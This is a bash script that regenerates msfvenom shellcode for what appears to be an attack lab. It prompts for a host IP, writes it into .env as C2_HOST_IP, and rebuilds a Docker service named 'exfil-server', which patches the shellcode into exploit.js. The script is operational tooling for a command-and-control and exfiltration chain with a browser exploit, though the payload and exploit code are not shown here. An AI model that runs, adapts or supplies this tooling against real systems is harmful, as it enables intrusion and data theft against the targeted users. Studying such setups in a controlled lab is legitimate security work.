#!/bin/bash

# ─────────────────────────────────────────────
#  Shellcode Regeneration — triggers Docker rebuild
# ─────────────────────────────────────────────
# msfvenom now runs inside the Docker builder stage, not on the host.
# To regenerate shellcode with a new IP, update .env and rebuild.

set -e

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
ENV_FILE="$SCRIPT_DIR/.env"
COMPOSE_FILE="$SCRIPT_DIR/docker-compose.yml"

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m'

echo ""
echo -e "${CYAN}================================================${NC}"
echo -e "${CYAN}         Shellcode Regeneration Script          ${NC}"
echo -e "${CYAN}================================================${NC}"
echo ""
echo -e "${YELLOW}[*] msfvenom runs inside the Docker builder stage.${NC}"
echo -e "    To regenerate shellcode, update the host IP and rebuild."
echo ""

# ── Get host IP ───────────────────────────────
CURRENT_IP=$(grep -oP '(?<=C2_HOST_IP=)\S+' "$ENV_FILE" 2>/dev/null || echo "")

if [ -n "$CURRENT_IP" ]; then
    echo -e "${YELLOW}[*] Current C2_HOST_IP in .env: ${GREEN}$CURRENT_IP${NC}"
    read -rp "    Enter new host IP (or press Enter to keep '$CURRENT_IP'): " INPUT_IP
    HOST_IP="${INPUT_IP:-$CURRENT_IP}"
else
    echo "    Available IPs:"
    ip -o -4 addr show | awk '{print $2, $4}' | grep -v '^lo ' | grep -v '127\.' | while read -r iface ip; do
        echo -e "      ${GREEN}$iface${NC} → ${ip%/*}"
    done
    echo ""
    read -rp "    Enter your Linux host IP: " HOST_IP
fi

if ! echo "$HOST_IP" | grep -qE '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
    echo -e "${RED}[!] Invalid IP: '$HOST_IP'. Exiting.${NC}"
    exit 1
fi

# ── Update .env ───────────────────────────────
cat > "$ENV_FILE" <<EOF
# Regenerated by generate_shellcode.sh on $(date)
C2_HOST_IP=${HOST_IP}
EOF
echo -e "${GREEN}[+] .env updated with C2_HOST_IP=${HOST_IP}${NC}"

# ── Rebuild exfil-server only ─────────────────
echo ""
echo -e "${YELLOW}[*] Rebuilding exfil-server (msfvenom + shellcode patch runs inside Docker)...${NC}"
echo ""

docker compose -f "$COMPOSE_FILE" up --build -d exfil-server

echo ""
echo -e "${GREEN}[+] Done. exploit.js has been patched inside the container for ${HOST_IP}.${NC}"
echo ""
